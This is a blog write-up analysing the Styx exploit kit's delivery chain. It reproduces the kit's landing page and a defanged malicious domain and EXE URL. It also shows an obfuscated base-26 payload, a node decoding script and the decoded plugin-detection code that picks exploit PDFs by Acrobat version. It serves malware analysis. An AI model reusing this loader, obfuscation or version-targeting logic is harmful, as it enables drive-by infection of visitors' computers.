Sunday, April 7, 2013

Styx Exploit Kit Analysis - building a bridge to the underworld


Time for another EK adventure. It is always fun looking into how these things work.
What to expect: obfuscated JavaScript, JARs, PDFs and the odd EXE file.
Let's get ready for the fun...

Styx seems to come from Greek mythology; it is the name of the river at the border to the underworld (according to Wikipedia).


So let's see if we can build a bridge over to the far side of the underworld... If not, we will drown halfway.

A tweet by @IbashBotnets led me to this one, thanks!

PS!! At the time of publishing: the site is still alive, so be careful.

1. Start with the redirector



--2013-04-06 hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 302 Found
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Location: hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=3693830346734333836633534663236673267363161656463683267326435343; path=/
  Status: 302
  X-Powered-By: ASP.NET version 4
  Content-Type: text/html; charset=utf-8
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 0
Location: hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/ [following]
--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/
Reusing existing connection to rupscare.org:80.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 472
Length: 472 [text/html]
Saving to: `pane.html'

     0K                                                       100% 25.6M=0s

2013-04-06 (25.6 MB/s) - `pane.html' saved [472/472]



So we got a cute little landing page / gate

<html>
<head>
<title>Spvfsgihxh</title>
</head>
<body>
<applet archive="IriBA.jar" code="iIzdFTw.tBAmwo" name="LlfkQbgj">
<param name="CxRAA" value="hxxp: //rupscare.org/f8UENz06Los0sIjA0h5KM11dfM16mOl0dhDI0LoPr0wS3P0vpSB0FdC60KwLL0XazR0I1By0Ftvl0woRa0HMhW0jybx0YczL030IR14y510akqt0btBC0Mlbx16DPl0O0Sm0IPWo03Vp20zsyN0Z5H80IlGk0Uw3f11ZiW0ri5k00zJC0bfMF0nwGj0q4Zx0eHYM0ZMsY/MydDzBPB3b.exe?ftptJ6NyGf0u=nZ&h=11"/>
</applet>
<script src="aDHRYLxXI.js"></script>
</body>
</html>


As with so many other EKs, straight to the applet. Looks like the link to the EXE is there in broad daylight as well. But let's see what secrets are behind the JavaScript first:


2. Fetching JS: aDHRYLxXI.js


--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/aDHRYLxXI.js
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=2653362373934343136336565313262653369393937366836353537336333366; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 176
Length: 176 [text/html]
Saving to: `aDHRYLxXI.js'

     0K                                                       100% 8.47M=0s

2013-04-06 (8.47 MB/s) - `aDHRYLxXI.js' saved [176/176]



Here is what we got:

var ykskT="p"+"df"+""+"\x78"+"."+"h"+"t"+"\x6dl"+"";
try{
var GyrcZ = LlfkQbgj.bFFvG();
if(GyrcZ.indexOf("rarAjl")<0){
location.href=ykskT;
}
}
catch(e){
location.href=ykskT;
}



Once again redirected, but where to? Well, we have seen worse: pdfx.html


3. Fetch pdfx.html


--2013-04-06 --  hxxp ://rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/pdfx.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=9373265346564633734316938346334303163636564373462363632373736656; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 618
Length: 618 [text/html]
Saving to: `pdfx.html'

     0K                                                       100% 30.1M=0s

2013-04-06 (30.1 MB/s) - `pdfx.html' saved [618/618]



<html>
<head>
<title>Uhrobayhjyqi</title>
</head>
<body>
<iframe style="display: none;" src="ocll.html" id="hrtuiai"></iframe>
<script>
var Theb=35;function wlxj(){var pXOm='oZUV';kQIqdJ='CAkXtK';if (kQIqdJ=='PXuT') kOhRAH();}function TqeV(){}
var CwjVUE=132;function utPc(){}
var krZBmfUN="&h=32";
</script>
<script>
window.onload=function(){
 ojzcz=document.getElementById("hrtuiai").contentWindow.document.getElementById("cxhvbb").value;
 pknxmtcs="";
 for(crvm=0;crvm<ojzcz.length;crvm+=2)
  pknxmtcs+=String.fromCharCode(parseInt(ojzcz.substr(crvm,2),26)-135);
 eval(pknxmtcs);
}
</script>
</body>
</html>


An iframe and some more JS. Notice that the JS code references the iframe: it reads the value of the textarea with id cxhvbb from the iframe's document, decodes it two characters at a time and evals the result.

Get ocll.html:

--2013-04-06 --  hxxp ://rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/ocll.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=8366930393133303532636430373836323362633532366262693031673162693; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 1678
Length: 1678 (1.6K) [text/html]
Saving to: `ocll.html'

     0K .                                                     100% 74.3M=0s

2013-04-06 (74.3 MB/s) - `ocll.html' saved [1678/1678]



<html>
<body>
<h1>
<textarea id="cxhvbb">5f939i9b909h969c9b6b87989h8a7m806j908m9b8o9a926n9j8o999i926n929l918o9m9g6k9o5f9j8o9f6b929l918o9h927e9b929k6b7l8o9h926j6k7c5f929l918o9h9
26p9g929h7l8o9h926j929l918o9h926p94929h7l8o9h926j6k6b6m6b929l918o9m9g6k7c5f9j8o9f6b908m9j8o999i927e929g908o9d926j9j8o999i926k6b6m6b6j6j929l918o9m9g7e7e9b9i99
996k6b7g6b6d6d6b7b6b6d7c6b929l9d969f929g7e6d6m929l918o9h926p9h9c8c8b7k8a9h9f969b946j6k6k7c5f919c909i9a929b9h6p909c9c9896927e908m9b8o9a926b6m6b6d7e6d6b6m6b908
m9j8o999i927c5fa05f9j8o9f6b9m9n879h8f7i80849h6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g926j6k7c5f96936j9m9n879h8f7i80849h6p969b91929l
86936j6d9k9c9k77756d6k7d716b6h6h6b9m9n879h8f7i80849h6p969b91929l86936j6d9a9g96926d6k7f7e716k9o5f87989h8a7m806j6d937o7o958b8o9g918o9g6d6n6b989f8h7j9a938c856n6
b726k7c5f919c909i9a929b9h6p9k9f969h926j6d7d96939f8o9a926b939f8o9a928p9c9f91929f7e6i716i6b9g909f9c9999969b947e6i9b9c6i6b9g9h9m99927e6i9d9c9g969h969c9b7b8o8p9g
9c999i9h927c9h9c9d7b719d9l7c9992939h7b719d9l7c6i6b9g9f907e6i939b9h9g6p959h9a996i7f7d7096939f8o9a927f6d6k7c5fa05f9j8o9f6b8a9d99969h859i9a7e939i9b909h969c9b6j9
g9h9f6k9o5f9j8o9f6b9f929h7e8i8k7c5f9j8o9f6b9g9d997e9g9h9f6p9g9d99969h6j708i8j6p8j8m6n6o8k70946k7c5f939c9f6j967e717c967d757c966m6m6k9o5f96936j9h9m9d929c936b9g
9d998i968k6c7e6d9i9b919293969b92916d6k9o9f929h8i968k7e9g9d998i968k7ca092999g929o9f929h8i968k7e6d716d7ca05fa05f9f929h9i9f9b6b9f929h6p979c969b6j6d6d6k7c5fa07c5
f9j8o9f6b7o929h859i9a7e939i9b909h969c9b6j9g9h9f6k9o5f9h9f9m9o5f9f929h9i9f9b6b8a9d99969h859i9a6j9g9h9f6p9a8o9h90956j708i8j918k8i8j918j6p8j8m6n6o8k6l706k6p979c
969b6j6d6d6k6k5fa0908o9h90956j906k9oa07c5f9f929h9i9f9b6b6d6d7c5fa07c5f9j8o9f6b7o929h8791938d929f9g969c9b7e939i9b909h969c9b6j6k9o5f96936j9b8o9j96948o9h9c9f6p9
d999i94969b9g6b6h6h6b9b8o9j96948o9h9c9f6p9d999i94969b9g6p99929b949h957f716k9o5f9j8o9f6b9d999i94969b858o9a926b7e6b9b8o9j96948o9h9c9f6p9d999i94969b9g8i6d7i919c
8p926b7i909f9c8p8o9h6d8k7c5f96936j6c9d999i94969b858o9a926k6b9f929h9i9f9b6b6d6d7c5f9j8o9f6b9d91938m9j929f8m9j929f9g969c9b7e7o929h859i9a6j9d999i94969b858o9a926
p9j929f9g969c9b6k7c5f9j8o9f6b9d91938m9j929f8m91929g909f969d9h969c9b7e7o929h859i9a6j9d999i94969b858o9a926p91929g909f969d9h969c9b6k7c5f9j8o9f6b9d91938m9j929f8m
9a969a927e6d6d7c5f96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d9996908o9h969c9b709j9b916p8o919c8p926p9d91939l9a996d8k6k9o9d91938m9j929f8m9a969a927e6
d7a6p716p716p716d7ca092999g929o96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d9996908o9h969c9b709j9b916p8o919c8p926p9l6o9a8o9f9g6d8k6k9o9d91938m9j929f
8m9a969a927e6d796p716p716p716d7ca0a07c5f96936j9d91938m9j929f8m9j929f9g969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m9j929f9g969c9b7c5fa05f92999g926b96936
j9d91938m9j929f8m91929g909f969d9h969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m91929g909f969d9h969c9b6b7c5fa05f92999g926b9o5f9f929h9i9f9b6b7o929h859i9a6j
9d91938m9j929f8m9a969a926k7c5fa05fa092999g929o5f9j8o9f6b91969j8m9c8p976b7e6b919c909i9a929b9h6p909f928o9h927m99929a929b9h6j6d91969j6d6k7c5f919c909i9a929b9h6p8
p9c919m6p8o9d9d929b917k959699916j91969j8m9c8p976k7c5f91969j8m9c8p976p969b9b929f7p8b84836b7e6b6i7d867j817m7k8b6b96916b7e6b6d87919387999i94868p976d6b9b8o9a927e
6d87919387999i94868p976d6b7k837i8a8a807l7e6d90999g96917b7k7i797i7a7879716o7379717l6o72727k7n6o7i73757l6o7575757676747675717171716d6b8e807l8b7p7e6d716d6b7p7m8
07o7p8b7e6d716d7f7d70867j817m7k8b7f6i7c5f9h9f9m9o5f9f929h9i9f9b6b7o929h859i9a6j87919387999i94868p976p7o929h8d929f9g969c9b9g6j6k6k7c5fa0908o9h90956j906k9o9f92
9h9i9f9b6b6d6d7ca07c5fa05fa05f9d91939j929f6b7e6b7o929h8791938d929f9g969c9b6j6k7c5f96936j9d91939j929f6c7e6d6d6k5f9d91939j929f7e9d8o9f9g92809b9h6j9d91939j929f6
k7c5f92999g926b9d91939j929f7e717c5f939i9b909h969c9b6b97869b968p9a8c6j6k6b9o5f9j8o9f6b9i8o6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g92
6j6k7c5f96936b6j9i8o6p969b91929l86936j6d9k969b6d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5fa05f939i9b909h969c9b6b8a8a829i7l6j6k9o5f96936j9b8o9j96948
o9h9c9f6p9i9g929f7i94929b9h6p969b91929l86936j6d7k959f9c9a926d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5fa05f939i9b909h969c9b6b98998d7l8d987p896j9f84
9h817p9a929g9d6k6b9o5f9j8o9f6b9d96939f6b7e6b919c909i9a929b9h6p909f928o9h927m99929a929b9h6j6d96936d6m6d9f8o6d6m6d9a926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h9
26j6i9k96919h956i6n6b72716k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i95929694959h6i6n6b72746k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9h9m99926i6n6b6d9h9c
9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9f906i6n6b9f849h817p9a929g9d6k7c5f919c909i9a929b9h6p8p9c919
m6p8o9d9d929b917k959699916j9d96939f6k7c5fa05f96936b6j97869b968p9a8c6j6k6b6h6h6b6c8a8a829i7l6j6k6k6b9o5f96936b6j6j9d91939j929f7f7e797171716b6h6h6b9d91939j929f
7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k5f98998d7l8d987p896j6d8f9k8g7j8a7o9687886p9d91936d6k7c5f96936b6j9d91939j9
29f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b797171716k5f98998d7l8d987p896j6d9l8a8p7o889d6p9d91936d6k7c5f96936b6j6c6j6j9d91939j929f7f7e797171716b6h6h6b9d9193
9j929f7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k6b6h6h6b6c6j9d91939j929f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b7
97171716k6k5f9g929h8b969a929c9i9h6j6d919c909i9a929b9h6p9k9f969h926j6i7d96939f8o9a926b9g9h9m99927e8j6d9h9c9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h928j
6d6b9g9f907e8j6d979c9j936p959h9a998j6d7f7d7096939f8o9a927f6i6k6d6n747171716k7c5fa05f</textarea>
</h1>
</body>
</html>



Just storage for the variable cxhvbb: input used to generate some more code.

Node.js is one of my friends for deobfuscating JS code. First clean the code up a bit (inline the textarea content as a variable and print the decoded result instead of eval-ing it), then run it with node. It is always nice to pipe the output through js-beautify to get nice and shiny code out.

Here is the JavaScript code to run in node:

// The decoder from pdfx.html, prepared to run in node: the textarea content
// is inlined as var1 (joined from the wrapped lines above) and eval() is
// replaced with console.log() so the next stage is printed instead of run.
var var1 =
"5f939i9b909h969c9b6b87989h8a7m806j908m9b8o9a926n9j8o999i926n929l918o9m9g6k9o5f9j8o9f6b929l918o9h927e9b929k6b7l8o9h926j6k7c5f929l918o9h9" +
"26p9g929h7l8o9h926j929l918o9h926p94929h7l8o9h926j6k6b6m6b929l918o9m9g6k7c5f9j8o9f6b908m9j8o999i927e929g908o9d926j9j8o999i926k6b6m6b6j6j929l918o9m9g7e7e9b9i99" +
"996k6b7g6b6d6d6b7b6b6d7c6b929l9d969f929g7e6d6m929l918o9h926p9h9c8c8b7k8a9h9f969b946j6k6k7c5f919c909i9a929b9h6p909c9c9896927e908m9b8o9a926b6m6b6d7e6d6b6m6b908" +
"m9j8o999i927c5fa05f9j8o9f6b9m9n879h8f7i80849h6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g926j6k7c5f96936j9m9n879h8f7i80849h6p969b91929l" +
"86936j6d9k9c9k77756d6k7d716b6h6h6b9m9n879h8f7i80849h6p969b91929l86936j6d9a9g96926d6k7f7e716k9o5f87989h8a7m806j6d937o7o958b8o9g918o9g6d6n6b989f8h7j9a938c856n6" +
"b726k7c5f919c909i9a929b9h6p9k9f969h926j6d7d96939f8o9a926b939f8o9a928p9c9f91929f7e6i716i6b9g909f9c9999969b947e6i9b9c6i6b9g9h9m99927e6i9d9c9g969h969c9b7b8o8p9g" +
"9c999i9h927c9h9c9d7b719d9l7c9992939h7b719d9l7c6i6b9g9f907e6i939b9h9g6p959h9a996i7f7d7096939f8o9a927f6d6k7c5fa05f9j8o9f6b8a9d99969h859i9a7e939i9b909h969c9b6j9" +
"g9h9f6k9o5f9j8o9f6b9f929h7e8i8k7c5f9j8o9f6b9g9d997e9g9h9f6p9g9d99969h6j708i8j6p8j8m6n6o8k70946k7c5f939c9f6j967e717c967d757c966m6m6k9o5f96936j9h9m9d929c936b9g" +
"9d998i968k6c7e6d9i9b919293969b92916d6k9o9f929h8i968k7e9g9d998i968k7ca092999g929o9f929h8i968k7e6d716d7ca05fa05f9f929h9i9f9b6b9f929h6p979c969b6j6d6d6k7c5fa07c5" +
"f9j8o9f6b7o929h859i9a7e939i9b909h969c9b6j9g9h9f6k9o5f9h9f9m9o5f9f929h9i9f9b6b8a9d99969h859i9a6j9g9h9f6p9a8o9h90956j708i8j918k8i8j918j6p8j8m6n6o8k6l706k6p979c" +
"969b6j6d6d6k6k5fa0908o9h90956j906k9oa07c5f9f929h9i9f9b6b6d6d7c5fa07c5f9j8o9f6b7o929h8791938d929f9g969c9b7e939i9b909h969c9b6j6k9o5f96936j9b8o9j96948o9h9c9f6p9" +
"d999i94969b9g6b6h6h6b9b8o9j96948o9h9c9f6p9d999i94969b9g6p99929b949h957f716k9o5f9j8o9f6b9d999i94969b858o9a926b7e6b9b8o9j96948o9h9c9f6p9d999i94969b9g8i6d7i919c" +
"8p926b7i909f9c8p8o9h6d8k7c5f96936j6c9d999i94969b858o9a926k6b9f929h9i9f9b6b6d6d7c5f9j8o9f6b9d91938m9j929f8m9j929f9g969c9b7e7o929h859i9a6j9d999i94969b858o9a926" +
"p9j929f9g969c9b6k7c5f9j8o9f6b9d91938m9j929f8m91929g909f969d9h969c9b7e7o929h859i9a6j9d999i94969b858o9a926p91929g909f969d9h969c9b6k7c5f9j8o9f6b9d91938m9j929f8m" +
"9a969a927e6d6d7c5f96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d9996908o9h969c9b709j9b916p8o919c8p926p9d91939l9a996d8k6k9o9d91938m9j929f8m9a969a927e6" +
"d7a6p716p716p716d7ca092999g929o96936j9b8o9j96948o9h9c9f6p9a969a928b9m9d929g8i6d8o9d9d9996908o9h969c9b709j9b916p8o919c8p926p9l6o9a8o9f9g6d8k6k9o9d91938m9j929f" +
"8m9a969a927e6d796p716p716p716d7ca0a07c5f96936j9d91938m9j929f8m9j929f9g969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m9j929f9g969c9b7c5fa05f92999g926b96936" +
"j9d91938m9j929f8m91929g909f969d9h969c9b6c7e6d6d6k9o5f9f929h9i9f9b6b9d91938m9j929f8m91929g909f969d9h969c9b6b7c5fa05f92999g926b9o5f9f929h9i9f9b6b7o929h859i9a6j" +
"9d91938m9j929f8m9a969a926k7c5fa05fa092999g929o5f9j8o9f6b91969j8m9c8p976b7e6b919c909i9a929b9h6p909f928o9h927m99929a929b9h6j6d91969j6d6k7c5f919c909i9a929b9h6p8" +
"p9c919m6p8o9d9d929b917k959699916j91969j8m9c8p976k7c5f91969j8m9c8p976p969b9b929f7p8b84836b7e6b6i7d867j817m7k8b6b96916b7e6b6d87919387999i94868p976d6b9b8o9a927e" +
"6d87919387999i94868p976d6b7k837i8a8a807l7e6d90999g96917b7k7i797i7a7879716o7379717l6o72727k7n6o7i73757l6o7575757676747675717171716d6b8e807l8b7p7e6d716d6b7p7m8" +
"07o7p8b7e6d716d7f7d70867j817m7k8b7f6i7c5f9h9f9m9o5f9f929h9i9f9b6b7o929h859i9a6j87919387999i94868p976p7o929h8d929f9g969c9b9g6j6k6k7c5fa0908o9h90956j906k9o9f92" +
"9h9i9f9b6b6d6d7ca07c5fa05fa05f9d91939j929f6b7e6b7o929h8791938d929f9g969c9b6j6k7c5f96936j9d91939j929f6c7e6d6d6k5f9d91939j929f7e9d8o9f9g92809b9h6j9d91939j929f6" +
"k7c5f92999g926b9d91939j929f7e717c5f939i9b909h969c9b6b97869b968p9a8c6j6k6b9o5f9j8o9f6b9i8o6b7e6b9b8o9j96948o9h9c9f6p9i9g929f7i94929b9h6p9h9c839c9k929f7k8o9g92" +
"6j6k7c5f96936b6j9i8o6p969b91929l86936j6d9k969b6d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5fa05f939i9b909h969c9b6b8a8a829i7l6j6k9o5f96936j9b8o9j96948" +
"o9h9c9f6p9i9g929f7i94929b9h6p969b91929l86936j6d7k959f9c9a926d6k7f7e716k6b9f929h9i9f9b6b727c5f9f929h9i9f9b6b717c5fa05f939i9b909h969c9b6b98998d7l8d987p896j9f84" +
"9h817p9a929g9d6k6b9o5f9j8o9f6b9d96939f6b7e6b919c909i9a929b9h6p909f928o9h927m99929a929b9h6j6d96936d6m6d9f8o6d6m6d9a926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h9" +
"26j6i9k96919h956i6n6b72716k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i95929694959h6i6n6b72746k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9h9m99926i6n6b6d9h9c" +
"9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h926d6k7c5f9d96939f6p9g929h7i9h9h9f968p9i9h926j6i9g9f906i6n6b9f849h817p9a929g9d6k7c5f919c909i9a929b9h6p8p9c919" +
"m6p8o9d9d929b917k959699916j9d96939f6k7c5fa05f96936b6j97869b968p9a8c6j6k6b6h6h6b6c8a8a829i7l6j6k6k6b9o5f96936b6j6j9d91939j929f7f7e797171716b6h6h6b9d91939j929f" +
"7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k5f98998d7l8d987p896j6d8f9k8g7j8a7o9687886p9d91936d6k7c5f96936b6j9d91939j9" +
"29f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b797171716k5f98998d7l8d987p896j6d9l8a8p7o889d6p9d91936d6k7c5f96936b6j6c6j6j9d91939j929f7f7e797171716b6h6h6b9d9193" +
"9j929f7d7e797371716k6b9p9p6b6j9d91939j929f7f7e7a7171716b6h6h6b9d91939j929f7d7e7a7471716k6k6b6h6h6b6c6j9d91939j929f6b7f7e6b777171716b6h6h6b9d91939j929f6b7d6b7" +
"97171716k6k5f9g929h8b969a929c9i9h6j6d919c909i9a929b9h6p9k9f969h926j6i7d96939f8o9a926b9g9h9m99927e8j6d9h9c9d7b7271719d9l7c9d9c9g969h969c9b7b8o8p9g9c999i9h928j" +
"6d6b9g9f907e8j6d979c9j936p959h9a998j6d7f7d7096939f8o9a927f6i6k6d6n747171716k7c5fa05f";

var Theb=35;function wlxj(){var pXOm='oZUV';kQIqdJ='CAkXtK';if (kQIqdJ=='PXuT') kOhRAH();}function TqeV(){}
var CwjVUE=132;function utPc(){}
var krZBmfUN="&h=32";
var ojzcz = var1;
var pknxmtcs = "";
// same loop as in pdfx.html: two characters per byte, base 26, minus 135
for (var crvm = 0; crvm < ojzcz.length; crvm += 2)
    pknxmtcs += String.fromCharCode(parseInt(ojzcz.substr(crvm, 2), 26) - 135);
// the kit does eval(pknxmtcs); print it instead and pipe through js-beautify
console.log(pknxmtcs);
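As an added example (my own code, not the kit's and not the node script above), here is a reusable decoder for the two-character, base-26, minus-135 scheme that pdfx.html uses, with the matching encoder so a round trip can be checked offline, and a small sink finder that says whether a decoded stage still contains eval or document.write and therefore needs another round. The radix and offset come from the decoder in pdfx.html; the function names and the sample plaintext are my own.

```javascript
// Added example, not the kit's code: decoder/encoder for the Styx pair scheme.
// Each plaintext character is stored as two base-26 digits of (charCode + 135);
// radix and offset are the ones used in pdfx.html, the names here are my own.

function decodePairs(encoded, radix = 26, offset = 135) {
  // Drop whitespace that blog/HTML wrapping may have inserted: one stray
  // newline inside the text would shift every following pair by one.
  const clean = encoded.replace(/\s+/g, "");
  if (clean.length % 2 !== 0) {
    throw new Error("pair-encoded text must have an even length");
  }
  let out = "";
  for (let i = 0; i < clean.length; i += 2) {
    const pair = clean.substr(i, 2);
    const n = parseInt(pair, radix);
    if (Number.isNaN(n)) {
      throw new Error("not a base-" + radix + " pair at offset " + i + ": " + pair);
    }
    out += String.fromCharCode(n - offset);
  }
  return out;
}

function encodePairs(plain, radix = 26, offset = 135) {
  let out = "";
  for (let i = 0; i < plain.length; i++) {
    // charCode + offset stays below radix^2 for all ASCII, so two digits suffice
    out += (plain.charCodeAt(i) + offset).toString(radix).padStart(2, "0");
  }
  return out;
}

// Report the dynamic-code sinks in a decoded stage so the analyst knows
// whether another decoding round is needed before the real payload appears.
function findSinks(decoded) {
  const sinks = ["eval(", "document.write(", "setTimeout(\"", "Function("];
  return sinks.filter((s) => decoded.indexOf(s) >= 0);
}

// Constructed sample: a stage that only calls document.write, so the
// round trip and the sink finder can be checked without touching the kit.
const SAMPLE_STAGE = "var x = 1; document.write('<b>' + x + '</b>');";
const SAMPLE_ENCODED = encodePairs(SAMPLE_STAGE);

console.log(decodePairs(SAMPLE_ENCODED));
console.log(findSinks(decodePairs(SAMPLE_ENCODED)));
```

Feeding the kit's textarea text to decodePairs gives the same output as the node script; the whitespace stripping is there because the blog wraps the text at an odd column, which would otherwise misalign every pair after the first line break.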


4. Say hello to the Plugin Detector unit of Styx


function PktSEI(c_name, value, exdays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
    document.cookie = c_name + "=" + c_value;
}
var yzPtXAIMt = navigator.userAgent.toLowerCase();
if (yzPtXAIMt.indexOf("wow64") < 0 && yzPtXAIMt.indexOf("msie") >= 0) {
    PktSEI("fGGhTasdas", krZBmfUN, 1);
    document.write("<iframe frameborder='0' scrolling='no' style='position:absolute;top:0px;left:0px;' src='fnts.html'></iframe>");
}
var SplitNum = function(str) {
        var ret = [];
        var spl = str.split(/[\.\_,-]/g);
        for (i = 0; i < 4; i++) {
            if (typeof spl[i] != "undefined") {
                ret[i] = spl[i];
            } else {
                ret[i] = "0";
            }
        }
        return ret.join("");
    };
var GetNum = function(str) {
        try {
            return SplitNum(str.match(/[\d][\d\.\_,-]*/).join(""))
        } catch (c) {};
        return "";
    };
var GetPdfVersion = function() {
        if (navigator.plugins && navigator.plugins.length > 0) {
            var pluginName = navigator.plugins["Adobe Acrobat"];
            if (!pluginName) return "";
            var pdf_ver_version = GetNum(pluginName.version);
            var pdf_ver_description = GetNum(pluginName.description);
            var pdf_ver_mime = "";
            if (navigator.mimeTypes["application/vnd.adobe.pdfxml"]) {
                pdf_ver_mime = "9.0.0.0";
            } else {
                if (navigator.mimeTypes["application/vnd.adobe.x-mars"]) {
                    pdf_ver_mime = "8.0.0.0";
                }
            };
            if (pdf_ver_version != "") {
                return pdf_ver_version;
            } else if (pdf_ver_description != "") {
                return pdf_ver_description;
            } else {
                return GetNum(pdf_ver_mime);
            }
        } else {
            var div_obj = document.createElement("div");
            document.body.appendChild(div_obj);
            div_obj.innerHTML = '<OBJECT id = "PdfPlugObj" name="PdfPlugObj" CLASSID="clsid:CA8A9780-280D-11CF-A24D-444553540000" WIDTH="0" HEIGHT="0"></OBJECT>';
            try {
                return GetNum(PdfPlugObj.GetVersions());
            } catch (c) {
                return "";
            };
        }
    }
pdfver = GetPdfVersion();
if (pdfver != "") pdfver = parseInt(pdfver);
else pdfver = 0;

function jOnibmU() {
    var ua = navigator.userAgent.toLowerCase();
    if (ua.indexOf("win") >= 0) return 1;
    return 0;
}

function SSKuD() {
    if (navigator.userAgent.indexOf("Chrome") >= 0) return 1;
    return 0;
}

function klVDVkHR(rMtJHmesp) {
    var pifr = document.createElement("if" + "ra" + "me");
    pifr.setAttribute('width', 10);
    pifr.setAttribute('height', 13);
    pifr.setAttribute('style', "top:100px;position:absolute");
    pifr.setAttribute('src', rMtJHmesp);
    document.body.appendChild(pifr);
}
if (jOnibmU() && !SSKuD()) {
    if ((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9300)) klVDVkHR("XwYBSGiPQ.pdf");
    if (pdfver >= 6000 && pdfver < 8000) klVDVkHR("xSbGQp.pdf");
    if (!((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9300)) && !(pdfver >= 6000 && pdfver < 8000)) setTimeout("document.write('<iframe style=\"top:100px;position:absolute\" src=\"jovf.html\"></iframe>')", 3000);
}


It looks like the plugin detection script has changed from PluginDetect 0.7.8 to a slimmer, more customized one.
